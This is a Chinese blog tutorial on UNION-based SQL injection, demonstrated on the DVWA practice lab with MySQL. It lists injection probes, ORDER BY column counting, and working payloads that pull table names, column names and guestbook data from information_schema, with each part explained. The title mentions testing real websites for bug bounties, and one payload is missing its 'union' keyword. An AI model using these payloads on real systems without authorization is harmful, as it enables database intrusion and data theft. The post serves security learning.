union联合查询测试真实网站的步骤

已于 2024-06-21 07:52:39 修改
阅读量599 收藏 11
点赞数 12
文章标签: 数据库
于 2024-03-19 08:05:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a126976/article/details/136828084
版权
文章介绍了如何利用SQL注入技术对DVWA靶场的Mysql数据库进行低级别测试,包括测试网站是否存在漏洞、获取表名、列名以及数据。详细解释了如何构造UNION查询来达到这些目的。
摘要由CSDN通过智能技术生成

1.输入1‘或1 and 1=1或1' and '1'=2来测试网站是否存在sql注入漏洞

2.使用语句order by判断有多少列数,如’1‘ order by 2#

3.使用union select 1,2(例)来进一步获取回显位置(这里最好将union左边查询的为-1会较大值,这样,才会把显示第一位让出来)

4.在回显位输入想要查询的内容,如select database()或select version()

到这里,真实网站的测试步骤就已经完结了,因为本人是挖src的,所以步骤才会这样结束。如上内容为DVWA靶场sql注入的low级别的测试,数据库为Mysql

如下为进一步获取表,列,数据的步骤:

获取表名:

-1' union select 1,table_name from information_schema.tables where table_schema='dvwa'%23

每一部分的作用:

  1. ': 单引号用于表示一个字符串的开始和结束。

  2. union: 用于合并两个或多个 SELECT 语句的结果集。

  3. select 1: 在 UNION 语句中,表示选择一个常数值 1,用于与第二个 SELECT 语句中的结果集进行合并。

  4. table_name: 表示要查询的字段,这里是 information_schema.table 表中的 table_name 字段,用于获取表名。

  5. from information_schema.tables: 指定要查询的表为 information_schema.tables,该表存储了数据库中所有表的信息。

  6. where table_schema='dvwa': 设定查询条件,筛选出 table_schema 为 ‘dvwa’ 的表,即数据库中属于 ‘dvwa’ 数据库的表名。

 可简单总结为       查询所在列      查询所在表     查询所在行

查询表中字段名:-1’ select 1,column_name from information_schema.columns where table_name ='guestbook' and table_schema ='dvwa'%23

每一部分的作用:

  1. -1’: 在一些 SQL 数据库中,如果该语句考虑到输入时的负数值,则可能会产生问题,因此添加一个负号可以规避这些问题。-1'表示添加负号,后接单引号表示字符串的结束。

  2. select: 指定查询操作。

  3. 1: 表示选择常数值 1,用于与后续 SELECT 语句的结果进行合并。

  4. column_name: 表示要查询的字段,这里是 information_schema.columns 表中的 column_name 字段,用于获取 guestbook 表的所有列名。

  5. from information_schema.columns: 指定查询的表为 information_schema.columns,该表用于存储数据库中所有表的列信息。

  6. where: 指定查询条件。

  7. table_name='guestbook': 指定表名为 guestbook 的表。

  8. and: 用于连接多个查询条件。

  9. table_schema='dvwa': 指定表的 schema 名称为 dvwa,即限制查询的表位于 dvwa 数据库中。

获取表中记录:-1' union select 1,comment from guestbook%23

到此完结,感谢观看。

万物为静以终
关注
  • 12
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Mysql联合查询UNIONUNION ALL的使用介绍
09-10
本文详细介绍了Mysql的联合查询命令UNIONUNION ALL,总结了使用语法和注意事项,以及学习例子和项目例子,需要的朋友可以参考下
SQL 注入之 UNION 查询(回显
猎荒者
12-13 3094
前言 随笔一篇,记录方法,举一反三。 1 环境 ① 在线漏洞网站:http://testphp.vulnweb.com ② 浏览器:Firefox ③ 插件:Hackbar Quantum ps: 正版 Hackbar 已经收费,解决方法: 【1】采用低版本的 Hackbar 【2】采用其他替代品,如: 本次实验主要使用 Backbar Quantum load: 加载当前页面的 URL spl...
sql注入之union联合注入
热门推荐
kingdring的博客
11-14 1万+
ps:21号祥云杯,为了避免连到都签不上,临时抱一波佛脚。 声明1:本文章使用的数据皆为官网公示,为保护信息已做打码 声明2:此系列文章仅用于CTF学习及信息安全防御技术,建议读者应用之前在 本地 搭建数据库或靶场等实践环境,在公网使用相关技术前请通读 《网络安全法》 union联合注入 上一篇大致说了sql注入的一些基本原理,这一篇说一说union的相关内容 联合查询 啥是联合查询 select a from b union select c from d where e; 大致就是这样 显然union
sql注入——union联合查询注入
Night_time的博客
05-03 1860
目录 一,sql注入必记的一库三表 二,union联合查询注入 1,基本注入流程 1,判断注入点 2,判断多少列 3,判断显示位 4,显示数据库的基本信息 5,显示有哪些数据库 6,显示数据库下有哪些表 7,判断表里有哪些字段 八,查询数据表中有哪些数据 一,sql注入必记的一库三表 Information_schema(数据库)(MySQL中默认的数据库) ...
leftOuterJoin
cts618
03-04 347
leftOuterJoin package com.cnic.flink.dataset.coding import org.apache.flink.api.scala.ExecutionEnvironment import org.apache.flink.streaming.api.scala._ import scala.collection.mutable.ListBuffer object leftOuterJoin { def main(args: Array[String]): .
union测试大端小端的例子
Luo_YuPing
04-21 752
测试os的大端小端模式的栗子网上最为普通暴力的方式是:定义int变量,取高地址的数和相邻低地址存放的值的关系:高地址放高位,低地址放着地位,就是little endian,反之,则为high endian但是,借助共用体也可以,参照这思路,也可以这样玩,算是对共用体的一个小小的应用!#include <stdio.h>typedef union { unsigned short int v
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
SQL学习笔记六 union联合结果集使用
09-11
总结来说,`UNION`和`UNION ALL`是SQL中非常有用的工具,用于合并不同查询的结果,创建一个单一的、去重(对于`UNION`)的结果集。它们在数据分析、报表生成和数据整合等场景中有着广泛的应用。了解并熟练掌握这些...
数据库MySQL-union(联合)
12-14
在另一个例子中,我们展示了如何使用`UNION`将两个不同的条件查询组合起来,比如查询上海的男生和北京的女生。方法一是使用单一的`WHERE`子句,而方法二是使用`UNION`将两个独立的条件查询拼接起来,两者的效果是...
使用共用体union及指针测试大小端
tutu_hu的博客
01-17 663
使用共用体union和指针测试机器大小端,本质上是一样的。都是对内存的操作测试
C++复习02---union测试
刘小雨的博客
10-15 216
//测试union是公用内存的 union test { int k; struct { int a; int b; int c; }tt; }bb; void unionTest() { bb.tt.a = 1; bb.tt.b = 2; bb.tt.c = 3; cout << bb.tt.a << bb.tt.b << bb.tt.c &l...
seatunnel2.3.3在centos7上安装
鑫哥
08-09 881
安装前需要准备点环境,因为seatunnel是基于java开发的,因此需要先安装java,我这里使用的java1.8,可以网上搜索下java安装教程,记得配置JAVA_HOME环境变量。在安装的过程中需要用到mysql命令,因此也需要安装下MySQL环境,这里也不具体讲解了,在网上搜索安装就行。接下来就是正式安装seatunnel了,
JDBC详细使用
m0_73627305的博客
08-09 527
​ JDBC是一种标准,一种规则,主要作用是使用java语言操作数据库的​ JDBC这个标准中有很多的接口,接口中有很多方法。
springboot民办高校科研项目管理系统-计算机毕业设计源码54009
VX_DZbishe的博客
08-11 523
论文主要是对基于springboot的民办高校科研项目管理系统进行了介绍,包括研究的现状,还有涉及的开发背景,然后还对系统的设计目标进行了论述,还有系统的需求以及整个的设计方案,对系统的设计以及实现,也都论述的比较细致,最后对基于springboot的民办高校科研项目管理系统进行了一些具体测试。本次报告,首先分析了研究的背景、作用、意义,为研究工作的合理性打下了基础。
mysql介绍
最新发布
weixin_57763462的博客
08-14 233
丰富的存储引擎:MySQL 提供了多种存储引擎,如 InnoDB、MyISAM、Memory 等,每种存储引擎都有其特定的应用场景和优势。多语言支持:MySQL 支持多种编程语言,包括 C、C++、Python、Java、Perl、PHP 等,并提供了相应的 API。安全性:MySQL 提供了灵活的权限和密码系统,支持基于主机的验证,并且所有的密码传输都采用加密形式,确保了数据的安全性。管理工具:MySQL 提供了丰富的管理工具,如命令行客户端、图形界面管理工具等,方便用户进行数据库的管理和维护。
zabbix的自动发现和注册、proxy代理和SNMP监控
Alone8046的博客
08-09 358
二、zabbix通过代理服务器添加主机:分布式监控,代理服务器的作用就是分担 server 的集中式压力;先有服务器,再有模版,模版当中设置应用集,模版当中设置应用集,再应用集中配置监控项,在监控项之后配置触发器,最后配置图形(可选项)zabbix proxy(代理服务器):代理服务器也要安装数据库,保存客户端的数据,然后再发送给服务端(代收器)zabbix客户端主动的和服务端联系,将自己的地址和端口发送给服务端,实现自动添加监控主机。snmp:简单网络管理协议,用来监控网络设备,可以监控交换机和路由器。
MySQL系统变量innodb_autoinc_lock_mode
zxrhhm的博客
08-14 573
`innodb_autoinc_lock_mode` 是 MySQL InnoDB 存储引擎的一个系统变量,它控制着自增(AUTO_INCREMENT)值的锁定机制。
redis内存淘汰策略-------Reservoir Sampling(水库采样)
weixin_46290302的博客
08-11 788
水库采样法(Reservoir Sampling)是一种在处理大规模数据流或未知大小的数据集合时,用于从中随机抽取固定数量样本的算法。它特别适用于数据流场景,因为在数据流开始之前并不知道其总量。核心思想水库采样的核心思想是在处理一个可能无限大的数据流时,从中抽取固定数量的样本,使得每个数据元素被选中的概率是相同的。操作步骤初始化:创建一个大小为k的“水库”数组,并将前k个元素直接存入水库。替换阶段对于每一个新的元素(假设这是第n个元素),生成一个随机数r,该随机数的范围是[0, n-1]。
基于JAVA生产制造执行系统设计与实现(源码+论文+讲解等)
程序员阿龙的博客
08-13 654
当下,如果 还依然使用纸质文档来记录并且管理相关信息,可能会出现很多问题,比如原始文件的丢失,因为采用纸质文档,很容易受潮或者怕火,不容易备份,需要花费大量的人员和资金来管理用纸质文档存储的信息,最重要的是数据出现问题寻找起来很麻烦,并且修改也困难,如果还这样操作会造成很大的资源浪费和经济损失。所以,对于本课题研究的产品生产制造信息的管理就需要有一款软件来代替手工操作,因此MES生产制造执行系统就应运而生。MES生产制造执行系统运用的工具包括Eclipse,Tomcat以及Navicat等。
union 联合查询
09-22
union 联合查询是一种在 SQL 中使用 UNION 操作符合并两个或多个 SELECT 语句的结果的方法。通过联合查询,可以将多个查询的结果集垂直拼接在一起,形成一个新的结果集。为了进行联合查询,需要满足以下条件:1)...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值